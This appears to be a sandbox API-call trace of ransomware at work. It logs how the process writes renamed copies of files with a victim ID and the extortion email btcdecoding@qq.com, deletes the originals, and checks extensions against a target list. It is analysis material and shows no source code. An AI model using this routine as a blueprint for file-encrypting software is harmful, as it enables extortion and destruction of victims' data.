[0044.549] lstrlenW (lpString=".ppt") returned 4 [0044.549] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0044.549] lstrlenW (lpString=".zip") returned 4 [0044.549] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.549] lstrlenW (lpString=".rar") returned 4 [0044.549] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.549] lstrlenW (lpString=".bz2") returned 4 [0044.549] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.549] lstrlenW (lpString=".7z") returned 3 [0044.549] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0044.549] lstrlenW (lpString=".dbf") returned 4 [0044.549] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0044.549] lstrlenW (lpString=".1cd") returned 4 [0044.549] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0044.549] lstrlenW (lpString=".jpg") returned 4 [0044.549] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.550] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=31975) returned 1 [0044.550] CloseHandle (hObject=0x17c) returned 1 [0044.550] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 0x20 [0044.550] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0044.550] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.550] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.551] GetLastError () returned 0x0 [0044.551] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x7ce7, lpOverlapped=0x0) returned 1 [0044.566] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x7cf0, lpOverlapped=0x0) returned 1 [0044.567] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.567] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.567] SetEndOfFile (hFile=0x210) returned 1 [0044.567] CloseHandle (hObject=0x210) returned 1 [0044.568] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.568] SetEndOfFile (hFile=0x17c) returned 1 [0044.568] CloseHandle (hObject=0x17c) returned 1 [0044.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.569] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 1 [0044.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0044.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0044.569] lstrlenW (lpString=".doc") returned 4 [0044.569] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.569] lstrlenW (lpString=".docx") returned 5 [0044.569] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.569] lstrlenW (lpString=".pdf") returned 4 [0044.569] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.569] lstrlenW (lpString=".xls") returned 4 [0044.569] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.569] lstrlenW (lpString=".xlsx") returned 5 [0044.569] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.569] lstrlenW (lpString=".ppt") returned 4 [0044.569] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0044.569] lstrlenW (lpString=".zip") returned 4 [0044.569] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.569] lstrlenW (lpString=".rar") returned 4 [0044.569] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.569] lstrlenW (lpString=".bz2") returned 4 [0044.569] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.569] lstrlenW (lpString=".7z") returned 3 [0044.569] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0044.569] lstrlenW (lpString=".dbf") returned 4 [0044.570] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0044.570] lstrlenW (lpString=".1cd") returned 4 [0044.570] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0044.570] lstrlenW (lpString=".jpg") returned 4 [0044.570] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.570] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.570] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.571] GetLastError () returned 0x0 [0044.571] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1004, lpOverlapped=0x0) returned 1 [0044.588] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1010, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1010, lpOverlapped=0x0) returned 1 [0044.589] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.589] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.589] SetEndOfFile (hFile=0x210) returned 1 [0044.589] CloseHandle (hObject=0x210) returned 1 [0044.589] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.589] SetEndOfFile (hFile=0x17c) returned 1 [0044.590] CloseHandle (hObject=0x17c) returned 1 [0044.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.590] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif")) returned 1 [0044.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0044.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0044.591] lstrlenW (lpString=".doc") returned 4 [0044.591] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.591] lstrlenW (lpString=".docx") returned 5 [0044.591] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.591] lstrlenW (lpString=".pdf") returned 4 [0044.591] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.591] lstrlenW (lpString=".xls") returned 4 [0044.591] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.591] lstrlenW (lpString=".xlsx") returned 5 [0044.591] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.591] lstrlenW (lpString=".ppt") returned 4 [0044.591] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0044.591] lstrlenW (lpString=".zip") returned 4 [0044.591] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.591] lstrlenW (lpString=".rar") returned 4 [0044.591] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.591] lstrlenW (lpString=".bz2") returned 4 [0044.591] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.591] lstrlenW (lpString=".7z") returned 3 [0044.591] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0044.591] lstrlenW (lpString=".dbf") returned 4 [0044.591] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0044.591] lstrlenW (lpString=".1cd") returned 4 [0044.591] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0044.591] lstrlenW (lpString=".jpg") returned 4 [0044.591] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.592] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=47962) returned 1 [0044.592] CloseHandle (hObject=0x17c) returned 1 [0044.592] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 0x20 [0044.592] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0044.592] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.872] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.872] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.873] GetLastError () returned 0x0 [0044.873] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xbb5a, lpOverlapped=0x0) returned 1 [0044.898] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xbb60, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xbb60, lpOverlapped=0x0) returned 1 [0044.899] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.899] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.899] SetEndOfFile (hFile=0x200) returned 1 [0044.899] CloseHandle (hObject=0x200) returned 1 [0044.899] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.899] SetEndOfFile (hFile=0x17c) returned 1 [0044.900] CloseHandle (hObject=0x17c) returned 1 [0044.900] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.901] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 1 [0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0044.901] lstrlenW (lpString=".doc") returned 4 [0044.901] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.901] lstrlenW (lpString=".docx") returned 5 [0044.901] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.901] lstrlenW (lpString=".pdf") returned 4 [0044.901] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.901] lstrlenW (lpString=".xls") returned 4 [0044.901] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.901] lstrlenW (lpString=".xlsx") returned 5 [0044.901] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.901] lstrlenW (lpString=".ppt") returned 4 [0044.901] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0044.901] lstrlenW (lpString=".zip") returned 4 [0044.901] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.901] lstrlenW (lpString=".rar") returned 4 [0044.901] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.901] lstrlenW (lpString=".bz2") returned 4 [0044.901] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.901] lstrlenW (lpString=".7z") returned 3 [0044.901] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0044.901] lstrlenW (lpString=".dbf") returned 4 [0044.901] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0044.902] lstrlenW (lpString=".1cd") returned 4 [0044.902] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0044.902] lstrlenW (lpString=".jpg") returned 4 [0044.902] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.115] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.115] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.115] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0045.115] GetLastError () returned 0x0 [0045.115] ReadFile (in: hFile=0x224, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x7279, lpOverlapped=0x0) returned 1 [0045.295] WriteFile (in: hFile=0x228, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x7280, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x7280, lpOverlapped=0x0) returned 1 [0045.297] ReadFile (in: hFile=0x224, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.297] WriteFile (in: hFile=0x228, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.297] SetEndOfFile (hFile=0x228) returned 1 [0045.297] CloseHandle (hObject=0x228) returned 1 [0045.297] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.297] SetEndOfFile (hFile=0x224) returned 1 [0045.298] CloseHandle (hObject=0x224) returned 1 [0045.298] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.298] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 1 [0045.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0045.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0045.299] lstrlenW (lpString=".doc") returned 4 [0045.299] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.299] lstrlenW (lpString=".docx") returned 5 [0045.299] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.299] lstrlenW (lpString=".pdf") returned 4 [0045.299] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.299] lstrlenW (lpString=".xls") returned 4 [0045.299] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.299] lstrlenW (lpString=".xlsx") returned 5 [0045.299] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.299] lstrlenW (lpString=".ppt") returned 4 [0045.299] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0045.299] lstrlenW (lpString=".zip") returned 4 [0045.299] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.299] lstrlenW (lpString=".rar") returned 4 [0045.299] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.299] lstrlenW (lpString=".bz2") returned 4 [0045.299] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.299] lstrlenW (lpString=".7z") returned 3 [0045.299] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0045.299] lstrlenW (lpString=".dbf") returned 4 [0045.299] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0045.299] lstrlenW (lpString=".1cd") returned 4 [0045.299] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0045.299] lstrlenW (lpString=".jpg") returned 4 [0045.299] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.734] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.734] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0045.975] GetLastError () returned 0x0 [0045.975] ReadFile (in: hFile=0x164, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x5534, lpOverlapped=0x0) returned 1 [0046.009] WriteFile (in: hFile=0x154, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x5540, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x5540, lpOverlapped=0x0) returned 1 [0046.010] ReadFile (in: hFile=0x164, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.010] WriteFile (in: hFile=0x154, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.010] SetEndOfFile (hFile=0x154) returned 1 [0046.011] CloseHandle (hObject=0x154) returned 1 [0046.011] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.011] SetEndOfFile (hFile=0x164) returned 1 [0046.011] CloseHandle (hObject=0x164) returned 1 [0046.012] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.012] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png")) returned 1 [0046.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0046.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0046.012] lstrlenW (lpString=".doc") returned 4 [0046.012] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.012] lstrlenW 